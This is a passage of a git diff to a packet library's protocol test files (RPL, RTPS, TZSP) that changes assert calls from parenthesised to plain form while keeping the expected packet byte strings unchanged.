b'\x60\x00\x00\x00\x00\x34\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xef\x1e\x32\x00\x00\x01\x88\xf0\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x0e\x00\x14\x03\x0a\x00\x00\x01\x00\x00\x01\x00\xff\xff\xff\x02\x06\x07\x00\x00\x02\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x34\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xef\x1e\x32\x00\x00\x01\x88\xf0\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x0e\x00\x14\x03\x0a\x00\x00\x01\x00\x00\x01\x00\xff\xff\xff\x02\x06\x07\x00\x00\x02\x00\x01' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO(dodagid="aaaa::1")/RPLOptPIO(plen=64, prefix="fd00::1")) -assert(p == b'\x60\x00\x00\x00\x00\x3c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xbc\x2b\x32\x00\x00\x01\x88\xf0\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x08\x1e\x40\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x3c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xbc\x2b\x32\x00\x00\x01\x88\xf0\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x08\x1e\x40\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' p = raw(IPv6(src="fe80::1", dst="fe80::2")/ICMPv6RPL()/RPLDAO()/RPLOptTgtDesc()) -assert(p == b'\x60\x00\x00\x00\x00\x0e\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\xab\x32\x00\x00\x01\x09\x04\x00\x00\x00\x00') +assert p == b'\x60\x00\x00\x00\x00\x0e\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\xab\x32\x00\x00\x01\x09\x04\x00\x00\x00\x00' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCNSA()) -assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa9\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x01\x00\x00\x02\x00\x00') +assert p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa9\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x01\x00\x00\x02\x00\x00' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCNodeEnergy()) -assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa8\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x02\x00\x00\x02\x00\x00') +assert p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa8\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x02\x00\x00\x02\x00\x00' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCHopCount()) -assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa7\x05\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x03\x00\x00\x02\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa7\x05\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x03\x00\x00\x02\x00\x01' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkThroughput()) -assert(p == b'\x60\x00\x00\x00\x00\x26\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa5\xff\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x08\x04\x00\x00\x04\x00\x00\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x26\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa5\xff\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x08\x04\x00\x00\x04\x00\x00\x00\x01' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkColor()) -assert(p == b'\x60\x00\x00\x00\x00\x25\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\x61\x03\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x07\x08\x00\x00\x03\x00\x00\x41') +assert p == b'\x60\x00\x00\x00\x00\x25\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\x61\x03\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x07\x08\x00\x00\x03\x00\x00\x41' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkLatency()) -assert(p == b'\x60\x00\x00\x00\x00\x26\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa4\xff\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x08\x05\x00\x00\x04\x00\x00\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x26\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa4\xff\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x08\x05\x00\x00\x04\x00\x00\x00\x01' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkQualityLevel()) -assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa4\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x06\x00\x00\x02\x00\x00') +assert p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa4\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x06\x00\x00\x02\x00\x00' = RPL Base Objects dissection # Test DIS dissection p = ICMPv6RPL(b'\x9b\x00\x00\x00\x00\x00') -assert(p.code == 0) +assert p.code == 0 # Test DIO dissection p = ICMPv6RPL(b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -assert(p.code == 1) -assert(p.RPLInstanceID == 50) -assert(p.ver == 0) -assert(p.rank == 1) -assert(p.G == 1) -assert(p.mop == 1) -assert(p.dtsn == 240) -assert(p.dodagid == "::1") +assert p.code == 1 +assert p.RPLInstanceID == 50 +assert p.ver == 0 +assert p.rank == 1 +assert p.G == 1 +assert p.mop == 1 +assert p.dtsn == 240 +assert p.dodagid == "::1" # Test DAO dissection p = ICMPv6RPL(b'\x9b\x02\x00\x00\x32\x00\x00\x01') -assert(p.code == 2) +assert p.code == 2 + Test RPL Control Message Options = RPL Control Options construction # DIS -assert(raw(ICMPv6RPL()/RPLDIS()/RPLOptPad1()) == b'\x9b\x00\x00\x00\x00\x00\x00') +assert raw(ICMPv6RPL()/RPLDIS()/RPLOptPad1()) == b'\x9b\x00\x00\x00\x00\x00\x00' # DIS with solicited info option -assert(raw(ICMPv6RPL()/RPLDIS()/RPLOptSolInfo()) == \ - b'\x9b\x00\x00\x00\x00\x00\x07\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00') +assert raw(ICMPv6RPL()/RPLDIS()/RPLOptSolInfo()) == b'\x9b\x00\x00\x00\x00\x00\x07\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00' # DIO with DAG MC option with link ETX metric -assert(raw(ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkETX()) == \ - b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01') +assert raw(ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkETX()) == b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01' # Normal DAO message with single target, since transit -assert(raw(IPv6(src="fe80::1", dst="fe80::2")/\ +assert raw(IPv6(src="fe80::1", dst="fe80::2")/\ ICMPv6RPL()/RPLDAO()/\ RPLOptTgt(plen=128,prefix="fd00::1")/\ RPLOptTIO()) == \ - b'\x60\x00\x00\x00\x00\x22\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\x04\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x00\xff') + b'\x60\x00\x00\x00\x00\x22\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\x04\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x00\xff' -assert(raw(ICMPv6RPL()/RPLDAO(D=1, dodagid="fd00::1")/RPLOptDAGMC()) == \ - b'\x9b\x02\x00\x00\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00') +assert raw(ICMPv6RPL()/RPLDAO(D=1, dodagid="fd00::1")/RPLOptDAGMC()) == \ + b'\x9b\x02\x00\x00\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00' p=IPv6(b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -assert(p.payload.code == 7) # Its a DCO +assert p.payload.code == 7 # Its a DCO p=IPv6(b'\x60\x00\x00\x00\x00\x2c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x35\xbb\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') p.show() -assert(p.payload.code == 2) # Its a DAO +assert p.payload.code == 2 # Its a DAO p=IPv6(b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa3\x05\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01') #p.show() rpl=p.payload -assert(rpl.code == 1) +assert rpl.code == 1 dio=rpl.payload -assert(dio.RPLInstanceID == 50) -assert(dio.dtsn == 240) +assert dio.RPLInstanceID == 50 +assert dio.dtsn == 240 dagmc=dio.payload -assert(dagmc.len == 6) +assert dagmc.len == 6 mc=dagmc.options[0] -assert(mc.ETX == 1) +assert mc.ETX == 1 diff --git a/test/contrib/rtps.uts b/test/contrib/rtps.uts index 9b49b2bccd4..ea4c25fa3ed 100644 --- a/test/contrib/rtps.uts +++ b/test/contrib/rtps.uts @@ -45,7 +45,7 @@ pkt = b"\x52\x54\x50\x53\x02\x01\x01\x10\x57\x63\x10\x01\xd6\xab\x40\x7f" \ + Test endianness = PID_BUILTIN_ENDPOINT_QOS endianness -assert(raw(PID_BUILTIN_ENDPOINT_QOS(parameterId=119, parameterLength=0, parameterData=b"")) == b'w\x00\x00\x00') +assert raw(PID_BUILTIN_ENDPOINT_QOS(parameterId=119, parameterLength=0, parameterData=b"")) == b'w\x00\x00\x00' + Test RTPS @@ -55,7 +55,7 @@ pkt2 = RTPS()/RTPSMessage(submessages=[ RTPSSubMessage_INFO_TS(), RTPSSubMessage_DATA(), ]) -assert(bytes(RTPS()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert bytes(RTPS()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' = RTPS packet declaration pkt3 = RTPS( diff --git a/test/contrib/tzsp.uts b/test/contrib/tzsp.uts index 965565e0d84..45ea280282c 100644 --- a/test/contrib/tzsp.uts +++ b/test/contrib/tzsp.uts @@ -21,8 +21,8 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02')/ \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_KEEPALIVE) -assert(not tzsp_lyr.payload) +assert tzsp_lyr.type == TZSP.TYPE_KEEPALIVE +assert not tzsp_lyr.payload == basic TZSP header - keepalive + ignored end tag @@ -37,8 +37,8 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02')/ \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_KEEPALIVE) -assert(tzsp_lyr.guess_payload_class(tzsp_lyr.payload) is scapy.packet.Raw) +assert tzsp_lyr.type == TZSP.TYPE_KEEPALIVE +assert tzsp_lyr.guess_payload_class(tzsp_lyr.payload) is scapy.packet.Raw == basic TZSP header with RX Packet and EndTag @@ -55,14 +55,14 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_end = tzsp_lyr.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 encapsulated_payload = tzsp_lyr.get_encapsulated_payload() encapsulated_ether_lyr = encapsulated_payload.getlayer(Ether) -assert(encapsulated_ether_lyr.src == '00:03:03:03:03:03') +assert encapsulated_ether_lyr.src == '00:03:03:03:03:03' == basic TZSP header with RX Packet and Padding @@ -80,13 +80,13 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_padding = tzsp_lyr.payload -assert(tzsp_tag_padding.type == 0) +assert tzsp_tag_padding.type == 0 tzsp_tag_end = tzsp_tag_padding.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and RAWRSSI (byte, short) @@ -105,18 +105,18 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_raw_rssi_byte = tzsp_lyr.payload -assert(tzsp_tag_raw_rssi_byte.type == 10) -assert(tzsp_tag_raw_rssi_byte.raw_rssi == 42) +assert tzsp_tag_raw_rssi_byte.type == 10 +assert tzsp_tag_raw_rssi_byte.raw_rssi == 42 tzsp_tag_raw_rssi_short = tzsp_tag_raw_rssi_byte.payload -assert(tzsp_tag_raw_rssi_short.type == 10) -assert(tzsp_tag_raw_rssi_short.raw_rssi == 12345) +assert tzsp_tag_raw_rssi_short.type == 10 +assert tzsp_tag_raw_rssi_short.raw_rssi == 12345 tzsp_tag_end = tzsp_tag_raw_rssi_short.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and SNR (byte, short) @@ -135,20 +135,20 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_snr_byte = tzsp_lyr.payload -assert(tzsp_tag_snr_byte.type == 11) -assert(tzsp_tag_snr_byte.len == 1) -assert(tzsp_tag_snr_byte.snr == 23) +assert tzsp_tag_snr_byte.type == 11 +assert tzsp_tag_snr_byte.len == 1 +assert tzsp_tag_snr_byte.snr == 23 tzsp_tag_snr_short = tzsp_tag_snr_byte.payload -assert(tzsp_tag_snr_short.type == 11) -assert(tzsp_tag_snr_short.len == 2) -assert(tzsp_tag_snr_short.snr == 54321) +assert tzsp_tag_snr_short.type == 11 +assert tzsp_tag_snr_short.len == 2 +assert tzsp_tag_snr_short.snr == 54321 tzsp_tag_end = tzsp_tag_snr_short.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and DATA Rate @@ -166,15 +166,15 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_data_rate = tzsp_lyr.payload -assert(tzsp_tag_data_rate.type == 12) -assert(tzsp_tag_data_rate.len == 1) -assert(tzsp_tag_data_rate.data_rate == TZSPTagDataRate.DATA_RATE_33) +assert tzsp_tag_data_rate.type == 12 +assert tzsp_tag_data_rate.len == 1 +assert tzsp_tag_data_rate.data_rate == TZSPTagDataRate.DATA_RATE_33 tzsp_tag_end = tzsp_tag_data_rate.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and Timestamp @@ -192,15 +192,15 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_timestamp = tzsp_lyr.payload -assert(tzsp_tag_timestamp.type == 13) -assert(tzsp_tag_timestamp.len == 4) -assert(tzsp_tag_timestamp.timestamp == 0x11223344) +assert tzsp_tag_timestamp.type == 13 +assert tzsp_tag_timestamp.len == 4 +assert tzsp_tag_timestamp.timestamp == 0x11223344 tzsp_tag_end = tzsp_tag_timestamp.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and ContentionFree @@ -219,20 +219,20 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_contention_free_no = tzsp_lyr.payload -assert(tzsp_tag_contention_free_no.type == 15) -assert(tzsp_tag_contention_free_no.len == 1) -assert(tzsp_tag_contention_free_no.contention_free == TZSPTagContentionFree.NO) +assert tzsp_tag_contention_free_no.type == 15 +assert tzsp_tag_contention_free_no.len == 1 +assert tzsp_tag_contention_free_no.contention_free == TZSPTagContentionFree.NO tzsp_tag_contention_free_yes = tzsp_tag_contention_free_no.payload -assert(tzsp_tag_contention_free_yes.type == 15) -assert(tzsp_tag_contention_free_yes.len == 1) -assert(tzsp_tag_contention_free_yes.contention_free == TZSPTagContentionFree.YES) +assert tzsp_tag_contention_free_yes.type == 15 +assert tzsp_tag_contention_free_yes.len == 1 +assert tzsp_tag_contention_free_yes.contention_free == TZSPTagContentionFree.YES tzsp_tag_end = tzsp_tag_contention_free_yes.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and Decrypted @@ -251,20 +251,20 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_decrypted_no = tzsp_lyr.payload -assert(tzsp_tag_decrypted_no.type == 16) -assert(tzsp_tag_decrypted_no.len == 1) -assert(tzsp_tag_decrypted_no.decrypted == TZSPTagDecrypted.NO) +assert tzsp_tag_decrypted_no.type == 16 +assert tzsp_tag_decrypted_no.len == 1 +assert tzsp_tag_decrypted_no.decrypted == TZSPTagDecrypted.NO tzsp_tag_decrypted_yes= tzsp_tag_decrypted_no.payload -assert(tzsp_tag_decrypted_yes.type == 16) -assert(tzsp_tag_decrypted_yes.len == 1) -assert(tzsp_tag_decrypted_yes.decrypted == TZSPTagDecrypted.YES) +assert tzsp_tag_decrypted_yes.type == 16 +assert tzsp_tag_decrypted_yes.len == 1 +assert tzsp_tag_decrypted_yes.decrypted == TZSPTagDecrypted.YES tzsp_tag_end = tzsp_tag_decrypted_yes.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and FCS error @@ -283,20 +283,20 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_error_no = tzsp_lyr.payload -assert(tzsp_tag_error_no.type == 17) -assert(tzsp_tag_error_no.len == 1) -assert(tzsp_tag_error_no.fcs_error == TZSPTagError.NO) +assert tzsp_tag_error_no.type == 17 +assert tzsp_tag_error_no.len == 1 +assert tzsp_tag_error_no.fcs_error == TZSPTagError.NO tzsp_tag_error_yes = tzsp_tag_error_no.payload -assert(tzsp_tag_error_yes.type == 17) -assert(tzsp_tag_error_yes.len == 1) -assert(tzsp_tag_error_yes.fcs_error == TZSPTagError.YES) +assert tzsp_tag_error_yes.type == 17 +assert tzsp_tag_error_yes.len == 1 +assert tzsp_tag_error_yes.fcs_error == TZSPTagError.YES tzsp_tag_end = tzsp_tag_error_yes.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and RXChannel @@ -314,15 +314,15 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_rx_channel = tzsp_lyr.payload -assert(tzsp_tag_rx_channel.type == 18) -assert(tzsp_tag_rx_channel.len == 1) -assert(tzsp_tag_rx_channel.rx_channel == 123) +assert tzsp_tag_rx_channel.type == 18 +assert tzsp_tag_rx_channel.len == 1 +assert tzsp_tag_rx_channel.rx_channel == 123 tzsp_tag_end = tzsp_tag_rx_channel.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and Packet count @@ -340,15 +340,15 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_packet_count = tzsp_lyr.payload -assert(tzsp_tag_packet_count.type == 40) 